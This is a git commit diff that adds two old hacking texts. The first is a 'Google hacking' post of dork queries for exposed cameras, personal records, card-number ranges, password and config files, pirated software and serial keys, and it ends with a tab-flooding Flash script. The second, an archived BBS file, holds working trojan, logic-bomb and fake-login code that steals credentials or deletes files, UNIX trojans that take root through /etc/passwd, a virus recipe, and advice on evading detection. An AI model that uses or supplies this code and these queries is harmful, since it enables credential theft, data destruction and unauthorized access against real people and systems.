Initial push...

2021-02-20 19:25:30 -06:00
parent 5c13d22216
commit be147b0294
482 changed files with 112377 additions and 0 deletions

File diff suppressed because it is too large

@@ -0,0 +1,140 @@
How to use Google for Hacking.
Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be accomplished using Google.
1. Hacking Security Cameras
There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter
inurl:”viewerframe?mode=motion”
Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls.
you now have access to the Live cameras which work in real-time. You can also move the cameras in all the four directions, perform actions such as zoom in and zoom out. This camera has really a less refresh rate. But there are other search queries through which you can gain access to other cameras which have faster refresh rates. So to access them just use the following search query.
intitle:”Live View / AXIS”
Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.
2. Hacking Personal and Confidential Documents
Using Google it is possible to gain access to an email repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.
intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.
filetype:xls inurl:”email.xls”
Also its possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query
intitle:index.of finances.xls
3. Hacking Google to gain access to Free Stuffs
Ever wondered how to hack Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.
“?intitle:index.of?mp3 eminem“
Now youll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3″ with “pdf” or “zip” or “rar”.
4. Using Google, and some finely crafted searches we can find a lot of interesting information.
For Example we can find:
Credit Card Numbers
Passwords
Software / MP3s
…… (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
Try a few of these searches:
intitle:”Index of” passwords modified
allinurl:authuserfile.txt
“access denied for user” “using password”
“A syntax error has occurred” filetype:ihtml
allinurl: admin mdb
“ORA-00921: unexpected end of SQL command”
inurl:passlist.txt
“Index of /backup”
“Chatologica MetaSearch” “stack tracking:”
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
“parent directory ” /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
METHOD 3
put this string in google search:
inurl:microsoft filetype:iso
You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…
“# -FrontPage-” inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!
“AutoCreate=TRUE password=”
This searches the password for “Website Access Analyzer”, a Japanese software that creates webstatistics. For those who can read Japanese, check out the authors site at: coara.or.jp/~passy/ [or.jp]
“http://:@www” domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net
“http://:@www” bangbus or “http://:*@www”bangbus
Another way is by just typing
“http://bob:bob@www”
“sets mode: +k”
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.
allinurl: admin mdb
Not all of these pages are administrators access databases containing usernames, passwords and other sensitive information, but many are!
allinurl:authuserfile.txt
DCForums password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
intitle:”Index of” config.php
This search brings up sites with “config.php” files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.
eggdrop filetype:user user These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.
intitle:index.of.etc This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!
filetype:bak inurl:”htaccess|passwd|shadow|htusers” This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.
Lets pretend you need a serial number for windows xp pro.
In the google search bar type in just like this “Windows XP Professional” 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of fake porn sites that trick you.
or if you want to find the serial for winzip 8.1 “Winzip 8.1″ 94FBR
Credits and More Info http://johnny.ihackstuff.com
I have shown you this info to let you know that there is a real risk putting your info online. If you do want to buy stuff online make sure the site you are using is secure normally if a site is secure you will see a pop up saying you are now entering a secure part of the site or a symbal of a padlock at the bottom of your browser or just use pay pal, pay pal is very safe to use. But most of the time just use common sense if a site looks cheap it normally hasnt got the protection to keep your info safe. I am not saying dont buy stuff online because that is one of the best things about the internet i am just saying be aware of websites that want your bank details and there is no symbal of a padlock at the bottom of your browser
5.Crash a Computer using Flash and Google.
Open up a new flash document. Open up the Actions panel for the stage of the first frame. If its in Actionscript 2, write the following:
onEnterFrame = function () {
getURL(“http://www.google.com”, “_blank”);
}
Or if its actionscript 3 write the following:
function openGoogle(e:Event):void {
navigateToURL(“http://www.google.com”, “_blank”);
}
stage.addEventListener(Event.ENTER_FRAME, openGoogle);
Press Control-Enter when youre ready to crash your computer. What this does is repeatedly open up new tabs of Google. But it opens so many Google tabs every second that after maybe 20-30 seconds your computer will barely be able to respond to you mouse clicks or even mouse movements. Usually, any attempt to stop it will result in processing overload and cause the computer to freeze. The only real way to stop this is to force-quit BOTH flash.exe and iexplorer.exe. Some teachers may know enough to do this, but might accidentally close explorer.exe
hope you enjoyed this post. Pass your comments. Cheers!
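
Review bot: This file has no provenance header, although its "Credits and More Info http://johnny.ihackstuff.com" line shows the text was copied from elsewhere, and the commit message "Initial push..." says nothing about the origin of the 482 files; add a short header giving source, date and licence, and say whether the file is an unmodified archive copy. The query list also repeats itself: "allinurl: admin mdb" and "allinurl:authuserfile.txt" each appear once in the "Try a few of these searches" list and again with a description further down, and "?intitle:index.of? mp3" appears in section 3 and under METHOD 2, so if the file is meant to be maintained rather than archived, merge the duplicates into the described entries. For anyone using the list to audit their own sites, the entries reduce to a few checks worth stating at the top: directory indexing left on ("Index of" listings), backup and credential files reachable under the web root (the .bak, passlist.txt, service.pwd and config.php entries), and database error text shown to visitors (the "ORA-00921" and "access denied for user" entries).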

@@ -0,0 +1,836 @@
Filename = BBSFILES.DOC
THE FOLLOWING FILES WERE DOWNLOADED BY ME IN ONE EVENING, USING AN IBM-PC AND
MODEM. THEY WERE DOWNLOADED TO SHOW THE NATURE OF THE INFORMATION READILY
AVAILABLE TO THE THOUSANDS WHO ACCESS HACKER BOARDS - PROVIDED FOR
EDUCATIONAL PURPOSES ONLY, AND NOT TO RECOMMEND OR IMPLY ANY ILLEGAL USE
WHATSOEVER. THESE FILES JUST RELATE TO COMPUTER PHREAKING. THERE ARE MANY
MORE ON PHONE BOXING, WEAPONRY AND EXPLOSIVES, LOCKPICKING - YOU NAME IT!
(we are very interested in increasing this file for future updates of
COMPUTER PHREAKING and, separately, adding similar files for our PHONE COLOR
BOXES, and other technical and survival topics we have interest in (see our
catalog). If you have some good public domain info. for us, please send it
to us in an ASCII file(s), on 5.25" or 3.5" disk (use First Class Mail only),
to: CONSUMERTRONICS, 2011 Crescent Dr., P.O. Drawer 537, Alamogordo, NM
88310. If you require compensation for your help, let us know in advance
what you have and woa| yot w/uud lika for io)>
D/L1------------------------------
Virus, Trojan Horse, and Decoy Programs:
DEC MAINFRAMES:
===============
The following were devolped and tested on DEC Basic Plus, running under
the RSTS/E Operating system. All have been tested, and were sucessfully used
in the field. However, sucessful use depends on the savvy of the sysop,
legitimate users, and illegitimate ones. They work best on uninformed
(stupid) users and sysops, and when the hacker using them makes them
attractive, as when using trojan horses, or realistic, when using decoys.
TROJAN HORSE:
=============
What follows is a rough listing of the business end of a typical trojan
horse program. While this one just lowers the security of the programs on
the affected account, it could be easily modified to create another account,
or execute any other command. The key is the 'sy$=sys(chr$(14)+"....")'
statement. In BASIC PLUS Programming language, this command lets you execute
a DCL command from within a BASIC Program. Therefore, any DCL command, COPY,
DELETE, PIP, or even BYE could be inserted in the "...." space. I prefer
using PIP *.* <40> /RE, as what that will do is lower the protection codes
low enough for me to see the files on the account. This works with both
sysops and non-privlidged users, so I can benefit whenever someone runs it,
as opposed to something the sysop has to run in order for it to do whatever.
As a plus, if a sysop runs it, certain hidden files on the [1,*] account he/
she's using will become visible, which will, provided you know what you're
doing, enable you to get sysop status. Of course, you could also use PIP
[*,*] *.* <40> /RE, which, if a sysop runs it, will lower the protection of
every file on the system, one would have to add an error checking routine in
case a non-sysop ran it.
10 extend
20 sy$=sys(chr$(14)+"PIP *.* <40> /RE") 30 rem the following would be the
interesting little game you've wrote which 40 rem makes the program look
atractive, and compels the hapless user to 50 rem run it. 60 end
LOGIC BOMB:
===========
The following is an example of a simple logic bomb, which has proven to
Work very well. What it does is create a file on the effected account which
will delete all files on the account upon the next login, it also dumps the
user off the system for good measure, you could remove the logoff procedure,
and not affect program operating, but they then stand a chance of noticing
the little file you've added.
10 extend
20 open "login.com" as file #1
30 print #1,"pip *.* <60> /re"
40 print #1,"delete *.*"
50 close #1
60 sy$=sys(chr$(14)+"bye/f")
70 end
Now, line 30 is optional in this program. I have included it in case the
user has protected his files from accidental deletion. There is one instance
in which this program won't work properly. This is when the defualt language
upon logon isn't DCL, on occasion, some systems have BASIC as the default. In
this case, just add the following line.
25 print #1,"sw dcl"
And you'll switch to DCL before continuing to the rest of the program.
THE DECOY:
==========
This decoy is to be used on local terminals, ones that are connected to
the system via RS-232, such as in schools. It is also the riskiest of these
programs to use. What it basicly does is wait until input, and then act as a
login program, saving the users id# and password. Upon getting it, it informs
the user of an "invalid entry" and then returns control to the system. There
are a number of things to keep in mind when using this program. The first is
to change the program so it looks like your system. The second is to
remember that it runs under the account it's on, therefore you take a risk of
someone hitting [Break] while it's running, and getting into your account.
Finally, due to the BASIC language, you'll only get the project number of the
account (what's before the comma). However, since you'll have the password,
you'll get it in less than 255 tries.
10 extend
20 open "kb:" as file #1%
30 input #1%, z$
40 print "RSTS v8.0-06 MICOM I Job <10> KB31: ";date$(0);" ";time$(0)
50 print
60 print "Username: ";
70 input #1%, u$
80 print "Password: ";
90 sy$=sys(chr$(3))
100 input #1%, p$
110 sy$=sys(chr$(2))
120 print: print "Invalid Entry - Try Again"
130 print: print
140 print "Username: ";
150 input #1%, r$
160 sy$=sys(chr$(3))
170 print "Password: ";
180 input #1%, s$
190 sy$=sys(chr$(2))
200 open "acct.txt" as file #2
210 print #2,u$
220 print #2,p$
230 print #2,r$
240 print #2,s$
250 close #2
260 print: print "Access Denied"
270 sy$=sys(chr$(14)+"bye/f")
280 end
The parts which have to be changed are line 40, and the number of tries
it allows before logging you off. The system I used for devolpment allowed
only two tries, and most I've seen only allow two, but, it isn't always that
way. Finally, remember to save ALL input, for reasons which should be
obvious.
FREE MEMORY:
============
While this program isn't classified as a trojan horse, decoy, logic
bomb, or virus. It's quite interesting, and I've decided to include it. This
program enables you to look at unallocated space on the system's disk. It's
very useful when the sysop is creating and deleting accounts, and in schools
in order to yank deleted files, which happens when students are modifying
programs.
10 open "free.mem" as file #1%
20 put #1%, record nnnnn%
30 close #1%
GENERAL NOTES ON PC VIRUSES
===========================
Writing "funny programs" on PCs is a big pain-in-the-a__. There are two
major reasons why. The first is that most users know their PCs(Personal
Computers in general, not just IBM) like the back of their hand, and that any
wierdness would be immediately noticed, unlike a big multiuser system, where
there are amoungst other users, and basicly isolated in their own little
section of RAM. Secondly, they have to be extremly small, as to be hidden
effectively. While one can write the perfict virus with 64k, try writting
one in a few bytes of space. Personally, I feel the best way to screw over a
computer user is to put a magnet to his disks, but if you want to do it the
hard way, it is possible.
APPLE II+, //e. //c:
====================
The Apple series of computers is one of the simplest machines to
"infect", so to speak. Perhaps this is because it creator was a prima donna
hacker, but who knows. DOS 3.3 has several unsed spots in it, which are
adequete to hide a virus in. They are (in hex) $B78D-$B792 and $BCDF-$BCFF.
You can also, on pre-1983 versions of DOS 3.3, use BA69-BA93. There are also
some spots which aren't unused, but are used for such DOS commands such as
VERIFY, LOCK, UNLOCK, CHAIN, and MAXFILES. The classic virus program on the
Apple a machine language program which counts how many times someone does a
certain function, such as CATALOG, LOAD, or SAVE, and upon reaching a certain
number, initializes the disk. It is based in DOS memory, which means that
once the affected disk is booted, it stays in the machine until power down,
and can affect any disk which is used with said machine. It will also be
transfered to any disk which is initalized by the machine. The actual program
is very simple, provided you know 6502 machine language. What you do is make
a patch to the Command handler entry point for the Catalog command. The
location for the command handler is from $9D1E to $9D55. Look around in
there until you find a string which says "6EA5" this is the entry point for
the Catalog Handler, which is $A56E. Remember that. Change it to the
beginning of your "modification". I recommend $BCDF, since it is the bigest
stretch of memory which is truly safe. You then write a program which will
do an LDX (Load X Register) from a memory location where you're counter is,
say $B78D. You compare that memory to the number of times you want the
command to go through before deletion, say 20 hex. (CPA $20) if the number of
times is greater than the the number in the Compare statement ($20) then jump
to the init subroutine (BPL $4F5A)(The INIT start location is $5A4F), if not,
then Increment the X Register by 1 (INX $01), store it (STX $8DB7), you then
continue with your program by Cataloging the disk (JMP $6EA5). End of
program. I have found this to be one of the best virus programs, as these
things go.
D/L2---------------------------------------
COMMENTS ON "SMART" HACKING:
---------------------------
Never trust a change in a system. The 414s, the (expletive deleted),
were caught for this reason: When one of them connected to the system, there
was nothing good there. The next time, there was a Trek game stuck right in
their way! They proceeded to play said game for two, say two and half hours,
while TELENET was tracing them! Nice job, don't you think? If anything
looks suspicious, drop the line immediately!! As in Yesterday!! The point
we're trying to get across is: If you use a little common sense, you won't
get busted. Let the little kids who aren't smart enough to recognize a trap
get busted, it will take the heat off the real hackers. Now, let's say you
get on a computer system... it looks great, checks out, everything seems
fine. Ok, now is when it gets more dangerous. You have to know the computer
system (see future issues of this article for info on specific systems) to
know what not to do. Basically, keep away from any command which looks like
it might delete something, copy a new file into the acoount, or whatever!
Always leave the account in the same status you logged in with. Change
*nothing*... If it isn't any account with priv's (privileged access) then
don't try any commands that require them! All, yes, all systems are going to
be keeping log files of what users are doing, and that will show up. It is
just like dropping a trouble-card in an ESS system, after sending that nice
operator a pretty tone. Spend no excessive amounts of time on the account in
one stretch. Keep your calling to the very late night if possible, or during
business hours (believe it or not!). It so happens that more users are on
during business hours, and it is very difficult to read a log file with 60
users doing many commands every minute. Try to avoid systems where everyone
knows each other. Don't try to bluff. And above all: Never act like you
own the system, or are the best there is. They always grab the people who's
heads swell...
There is some very interesting front end equipment arownd nowadays. But
first let's define terms... By front end, we mean any device that you must
pass thru to gat at the real computer. There are devices that are made to
defeat hacker programs and just plain old multiplexers. To defeat hacker
programs, there are now devices that pick up the phone and just sit there...
This means that your device gets no carrier, thus you think there isn't a
computer on the other end. The only way around it is to detect when it was
picked up. If it picks up after the same number ring, then you know it is a
hacker-defeater. These devices take a multi-digit code to let you into the
system. Some are, in fact, quite sophisticated to the point where it will
also limit the user name's down, so only one name or set of names can be
valid logins after they input the code... Other devices input a number code,
and then they dial back a pre-programmed number for that code. These systems
are best to leave alone, because they know someone is playing with their
phone. You may think "But I'll just reprogram the dial-back." Think again,
how stupid that is... Then they have your number, or a test loop if you were
just a little smarter. If it's your number, they have your (expletive
deleted) (if male), if it's a loop, then you are screwed again, since those
loops are "monitored."
As for multiplexers... what a plexer is supposed to do is this: The system
can accept multiple users. We have to time share, so we'll let the front-end
processor do it... Well, this is what a multiplexer does. Usually they will
ask for something like "enter class" or "line:". Usually, it is programmed
for a double digit number, or a 4 or 5 letter word. There are usually a few
sets of numbers it accepts, but those numbers also set your 300/1200 baud
data type. These multiplexers are inconveneint at best, so not to worry.
A little about the history of hacking: Hacking, by our definition, means a
great knowledge of some special area. Doctors and lawyers are hackers of a
sort, by this definition. But most often, it is being used in the computer
context, and thus we have a dedinition of "anyone who has a great amount of
computer or telecommunications knowledge." You are not a hacker because you
have a list of codes... Hacking, by our defintion, has been around only
about 15 years. It started, where else but, MIT and colleges where they had
Computer Science or Electrical Engineering departments. Hackers have created
some of the best computer languages, the most awesome operating systems, and
even gone on to make millions. Hacking used to have a good name, when we
could honestly say "We know what we are doing." Now it means (in the public
eye): The 414s, Ron Austin, the NASA hackers, the ARPANET hackers... all the
people who have been caught. thus we come past the moralistic crap, and to
our purpose: Educate the hacker community...........
D/L3----------------------------
UNIX TROJAN HORSE - By Shooting Shark
-------------------------------------
This program simulates the login for a UNIX machine. However, the login
and password are written to a file in your directory. The user geat a "login
incorrect" message and thinks they have mis-typed their password. They are
given a second chance, but the new 'login:' prompt is the real one - they
then get access to their account and are none the wiser.
You must be running a fairly robust version of UNIX. 4.2 or 4.3bsd, or AT&T
System V are fine. I wrote this one on a Pyramid 90x32 bit system running
the above flavors of UNIX. It works fine for me and should work on your
system fine with no modification.
To run the program, enter the source given below in a file called 'horse.c'
and configure it as necessary (see below). Then, from the shell promp, type:
cc horse.c -lcurses -ltermcap (to compile the program)
then type:
mv a.out horse (to rename the object code.)
Voila, you now have a program which can be tested by typing 'horse'.
However, in order for the program to work properly, it must be called from a
shellscript. Create a file calle script and enter these two lines:
horse (invokes your program)
login
Now, type:
source script (run the shell script)
to execute the above file. The horse program will be run. It will simulate
the login process. After completing its task it will invoke the REAL login
process.
If you wish, you can tack the above two lines to your ".logout" file (the
shellscript which is executed when you log out) so the program will be
automatically executed each time you log out normally.
----Source Begins Here----
#include <curses.h>
#include <signal.h>
int stop();
main()
[
char name[10], password[10];
int i;
FILE *fp, *fpopen();
signal(SIGINT,stop);
initscr();
printf("\n\nTiburon Systems
4.2/Sys V UNIX (tiburon)\n\n\n\nlogin:");
/*The above line is very important - it prints the header that your machine
prints when it greets the world. Change this line so it says what your
machine would say. Each \n is a carriage return*/
scanf("%[^\n]",name)
getchar();
noecho();
printf("Password:");
scanf("%[^\n]',password),
printf("\n");
getchar();
echo();
sleep(5);
/*sleep(x) is the delay between prompting for a password and printing "Login
incorrect." Change it so it looks like your login routine's speed*/
if ( ( fp = fopen("stuff","a") ) ! = -1 ) [
fprintf(fp,"login %s has password %s\n",name,password);
fclose(fp); ]
printf("Login incorrect\n");
endwin(); ]
stop() [ /*the ^C trap.*/
exit(0); ]
----Source Ends Here----
OK. After you have run the program successfully and people have fallen for
it, a file called "stuff" will have a table of all login name/password
combinations snagged. (This file can be incriminating so delete it whenever
necessary.)
This program traps ^C's entered by suspicious users. However, it can't catch
a ^Z (STOP signal) so it is vulnerable to them. If somebody stops your
program, they will be in your account and your little game will be up. Also,
take care that you are using a terminal that times out after a few minutes
while waiting for somebody to come up to the terminal you're running it on.
D/L4--------------------------
THIS IS YET ANOTHER SHOOTING SHARK CONTRIBUTION TO UNIX INSECURITY
Introduction
------------
"UNIX Security" is an oxymoron. It's an easy system to brute-force hack
(most UNIX systems don't hang up after x number of login tries, and there are
a number of default logins, such as root, bin, sys and uucp). Once you're in
the system, you can easily bring it to its knees (see my previous Phrack
article, "UNIX Nasty Tricks") or, if you know a little C, you can make the
system work for you and totally eliminate the security barrier to creating
your own logins, reading anybody's files, etc. This file will outline such
ways by present C code that you can implement yourself.
Requirements
------------
You'll need a working account on a UNIX system. It should be a farily
robust version of UNIX (such as 4.2bsd or AT&T System V) running on a real
machine (a PDP/11, VAX, Pyramid, etc) for the best results. If you go to
school and have an account on the school system, that will do perfectly.
Notes
-----
This file was inspired by an article in the April, '86 issue of BYTE
entitled, "Making UNIX Secure." In the article, the authors way "We provide
this information in a way that, we hope, is interesting and useful yet stop
short of being a 'cookbook for crackers.' We have often intentionally
omitted details." I am following the general outline of the article, giving
explicit examples of the methods they touched on.
Project One: Fishing for Passwords
-----------------------------------
You can implement this with only a minimal knowledge of UNIX and C.
However, you need access to a terminal that many people use - the computer
lab at your school, for example. When you log onto a typical UNIX system,
you see something like this:
Tiburon Systems 4.2bsd / System V
(shark)
login: shark
Password (the password is not printed)
The program I'm giving you here simulates a logon sequence. You run the
program from a terminal and then leave. Some unknowing fool will walk up and
enter their login and password. It is written to a file of yours, then
"login incorrect" is printed, then the fool is asked to log in again. The
second time it's the real login program. This time the person succeeds and
they are none the wiser.
On the system, put the following code into a file called 'horse.c'. You will
need to modify the first 8 lines to fit your system's appearance.
----Code Begins Here----
#define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"
#define LOGIN "login: "
/*The above is the login prompt. You shouldn't have to change it unless
you're running some strange version of UNIX*/
#define PASSWORD "password:"
/*The above is the password prompt. You shouldn't have to change it,
either*/
#define WAIT 2
/*The numerical value assigned to WAIT is the delay you get after "password:"
Change it (0 = almost no delay. 5 = long delay) so it looks like your
system's delay. Realism is the key here - we don't want our target to become
suspicious.*/
#define INCORRECT "Login incorrect.\n"
/*Change the above so it is what your system says when an incorrect login is
given. You shouldn't have to change it.*/
#define FILENAME "stuff"
/*FILENAME is the name of the file that the hacked passwords will be put into
automatically. 'stuff' is a perfectly good name. Don't change the rest of
the program unless there is a need to and you know C*/
#include <curses.h>
#include <signal.h>
int stop();
main() [
char name[10], password[10];
int i;
FILE *fp, *fpopen();
signal(SIGINT,stop);
initscr();
printf(SYSTEM);
printf(LOGIN);
scanf("%[^\n]",name)
getchar();
echo();
sleep(WAIT);
printf("\n");
getchar();
echo();
if ( ( fp = fopen(FILENAME,"a") ) ! = NULL) [
#fprintf(fp,"login %s has password %s\n",name,password);
#fclose(fp);
#]
printf(INCORRECT);
endwin(); ]
stop() [
endwin();
exit(0); ]
----Source Ends Here----
OK, as I said, enter the above and configure it so it looks exactly like your
system's login sequence. To compile this program called 'horse.c' type the
following two lines: (don't type the %s, they are just a sample prompt)
% cc horse.c -lcurses -ltermcap
% mv a.out horse
You now have the working object code in a file called 'horse'. Run it, and
if it doesn't look like your systems logon sequence, re-edit horse.c and re-
compile it. When you're ready to put the program into use, create a new file
and call it 'trap' or something. 'trap' should have these two commands:
horse (runs your program)
login (runs the real login program)
to execute 'trap' type:
% source trap (again, % is just the prompt)
and walk away from your terminal.
After you've run it successfully a few times, check your file called 'stuff'
(or whatever you called it). It will look like this:
user john has password secret
user mary has password smegma
.
.
.
Copy down these passwords, then delete this file (it can be VERY
incriminating if the superuser sees it).
Note - for best results your terminal should be set to time-out after a few
minutes of non-use - that way, your horse program doesn't run idle for 14
hours if nobody uses the terminal you ran it on.
The next projects can be run on a remote system, such as the VAX in Michigan
you've hacked into, or Dartmouth's UNIX system, or whatever. However, they
require a little knowledge of C language. They're not something for UNIX
novices.
Project Two: Reading Anybocy's Files
------------------------------------
When somebody runs a program, they're the owner of the process created
and that program can do anything they would do, such as delete a file in the
directory or making a file of theirs available for reading by anybody.
When people save old mail they get on a UNIX system, it's put into a file
called "mbox" in their home directory. This file can be fun to read but is
usually impossible for anybody but the file's owner to read. Here is a short
program that will unlock (ie: chmod 777, or let anybody on the system read,
write or execute) the mbox file of the person who runs the program:
----Code Begins Here----
#include <pwd.h>
struct passwd *getpwnam(name);
struct passwd *p;
char buf [255];
main() [
p = getpwnam(getlogin());
sprintf(buf,"%s/%s",p->pw_dir,"mbox");
if ( access(buf,0) >-1 ) [
sprintf(buf,"chmod 777%s/%s",p->pw_dir,"mbox");
system(buf); ]
]
So the question is: How do I get my target to run this program that's in my
directory?
If the system you're on has a public-messages type of thing (on 4.xbsd, type
'msgs') you can advertise your program there. Put the above code in another
program (ie: IMPLANT A TROJAN HORSE) - find a utility or game program in some
magazine like UNIX WORLD and modify it and do the above before it does it's
real thing. so, if you have a program called tic-tac-toe and you've modified
it to unlock the mbox file of the user before it plays tic-tac-toe with him,
advertise "I have a new tic-tac-toe program running that you should all try.
It's in my directory." or whatever. If you don't have means of telling
everybody on the system via a public message, then just send mail to the
specific people you want to trap.
If you can't find a real program to modify, just take the above program and
add this line between the two ']' at the end of the program:
printf("Error opening tic-tac-toe data file.")
when the program runs, it will print the above error message. The user will
think "Heh, that dude doesn't know how to write a simple tic-tac-toe
program!" but the joke's on him - you can now read his mail.
If there's a specific file in a user's directory that you'd like to read (say
it's called "secret") just throw together this general program:
main() [
if ( access("secret",0) > -1 )
system("chmod 777 secret"); ]
then 'talk' or 'write' to him and act like Joe Loser: "I wrote this program
called super_star_wars, will you try it out?"
Use your imagination. Think of a command you'd like somebody to execute.
Then put it inside a system() call in a C program trick them into running
your program!
Here's a very neat way of using the above technique:
Project Three: Become the Superuser
------------------------------------
Write a program that you can get people to run. Put this line in it
somewhere:
if ( !strcmp(getlogin(),"root") )
system("whatever you want");
This checks to see if the root login is running your program. If he is, you
can have him execute any shell command you'd like. Here are some
suggestions:
"chmod 777 /etc/passwd"
/etc/passwd is the system's password file. The root owns this file.
Normally, everyone can read it (the passwords are encrypted) but only the
root can write to it. Take a look at it and see how it's formatted if you
don't know already. This command makes it possible for you to write to the
file (ie: create unlimited accounts for yourself and your friends).
"chmod 666 etc/group"
By adding yourself to some high-access groups, you can open many doors.
"chmod 666 /usr/lib/uucp/L.sys"
Look for this file on your system if it is on the uucp net. It contains
dialups and passwords to other systems on the net, and normally only the uucp
administrator can read it. Find out who owns this file and get him to
unknowingly execute a program to unlock it for you.
If you can get the root to execute this command, the system's passwd file
will be removed and the system will go down and will not come up for some
time to come. This is very destructive.
If you are going to go about adding a trojan horse program to the system,
there are some rules you should follow. If the hidden purpose is something
major (such as unlocking the user's mbox or deleting all of his files or
something) this program shouldn't be a program that people will be running a
lot (such as a popular computer game) - once people discover that their files
are public access the source of the problem will be discovered quite easily.
Save this purpose for a 'test' program (such as a game you're in the process
of writing) that you ask individual people to run via mail or 'chatting' with
them. As I said, this 'test' program can bomb or print a phony error message
after completing its task, and you will just tell the person "well, I guess
it needs more work", wait until they log off, and then read whatever file of
theirs that you've unlocked. If your trojan horse program's sole purpose is
to catch a specific user running it - such as the root or other high-powered
user - you can put the code to do so in a program that will be run a lot by
various users of the system. Your modification will remain dormant until he
runs it. If you can't find the source to 'star trek' or whatever in C, just
learn C and convert something from pascal. It can't hurt to learn C as it's
a great language. We've just seen what it can do on a UNIX system. Once
you've caught the root (ie: you can now modify the /etc/passwd file) remove
the spurious code from your trojan horse program and you'll never be caught.
D/L5----------------------------
TELENET HACKING
PREFACE:
--------
TELENET is a huge network which lets you enter another computer via
TELENET's and costs a little extra to those who log-on to their own
connection and account (but of course we shall ignore that).
HACKING:
--------
First dial your local TELENET dial up - here is just a few
BUFFALO (716) 847-0600
CHICAGO (312) 938-0500
DETROIT (313) 964-5538
964-2089
MANHATTAN (212) 736-0099
947-9600
785-2540
ROCHESTER (716) 454-3430
454-1020
WASHINGTON DC (202) 347-1400
(703) 435-3333
WHITE PLAINS (914) 328-9199
If your area is not listed contact your local phracker (phreaker/hacker) and
ask him if he has a local dial-up for your area.
Once you log on <RETURN> and it will ask you for a terminal identifier. You
can type "D1" if you are using a PC or just hit <RETURN>.
There are thousands of computer systems connected to TELENET, all you need to
do is type their connection number.
The format is: C NPAXX or C NPAXXX where:
C is the abbreviation for "Connection"
NPA is the area code of the computer system you wish to find
XX or XXX is an 2, and sometimes 3 digits
So, to search for a computer in 202, you would hack from 20201 up to 20299
and 202001 to 202999.
RESPONSE:
---------
Once you dial the connection number of what you hope is a computer
system, you will most likely get one of the following responses (we will use
21211 as an example):
"?" - You typed in something wrong (see format)
"212 11 ILLEGAL ADDRESS" - There is no computer system at 212 11 (try
another)
"212 11 CONNECTED" - You are now connected to the system at 212 11 and
should proceed)
"212 11 NOT RESPONDING" - There is a computer system at 212 11 but it is
not working now (try later)
"212 11 NOT REACHABLE FROM..." - There is a computer system at 212 11 but
it cannot be reached by this TELENET dial-up (try a different dialup)
"212 11 DOES NOT ACCEPT COLLECT CALLS" and
"212 11 DOES NOT ACCEPT COLLECT CALLS. PLEASE ESTABLISH A PAID CALLER
ACCOUNT" - In most cases the computer system will aceept collect calls from
whomever calls them, but a few require you to establish a specific log on
with TELENET first to place a paid call to a given connection.
COMMANDS
--------
Here is a short summary of TELENET commands.
COMMAND EFFECT
------- ------
FULL Sets net to full duplex (no echo)
HALF Sets net to half duplex (echo)
D Disconnect from node if still attached
CONTINUE Continue on system if still attached
ID Unknown. Maybe an ANI for nodes with security checking
Commands may be typed in upper or lower case.
You must first get the TELENET's attention to use the commands if you are
still attached to a node. The sequence of commands are:
<RETURN> (will be followed by a "@")
<RETURN> (if correct, the word "TELENET" should appear as well as
another "@")
COMMENTS:
---------
TELENET is a rather safe network to hack off of because the locations
usually cannot trace you and if they do, can probably not trace you thru
TELENET. Also, if a computer system is far away and you wish to log onto it,
there is no extra cost other than the cost to call TELENET.
D/L6--------------------------
TRASHING TECHNIQUES VOLUME i
PREFACE:
--------
This volume will deal with the basics of trashing.
You might be saying, "What is trashing? And why should I trash?".
Trashing is, to put it bluntly, the "inspection" of companies, schools,
peoples, etc. trash dumsters for the purpose of finding important material
that a person might find useful. (SOME MAY REASON THAT IF TRASHING IS GOOD
